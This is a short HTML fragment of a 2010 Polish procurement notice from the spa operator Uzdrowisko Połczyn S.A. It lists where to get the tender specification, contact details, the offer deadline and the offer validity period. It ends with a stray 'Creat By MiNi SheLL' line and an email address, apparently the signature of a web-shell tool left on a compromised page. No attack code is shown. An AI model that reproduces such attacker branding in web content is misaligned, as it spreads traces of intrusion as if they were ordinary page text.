<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.uzdrowisko-polczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Połczyn S.A.
ul. Zdrojowa 6
78-320 Połczyn Zdrój
tel. 094 36-62-424, 094 36-62-666
fax 094 36-62-470.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2010 godzina 10:00, miejsce: Uzdrowisko Połczyn S.A.
ul. Zdrojowa 6
78-320 Połczyn Zdrój.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com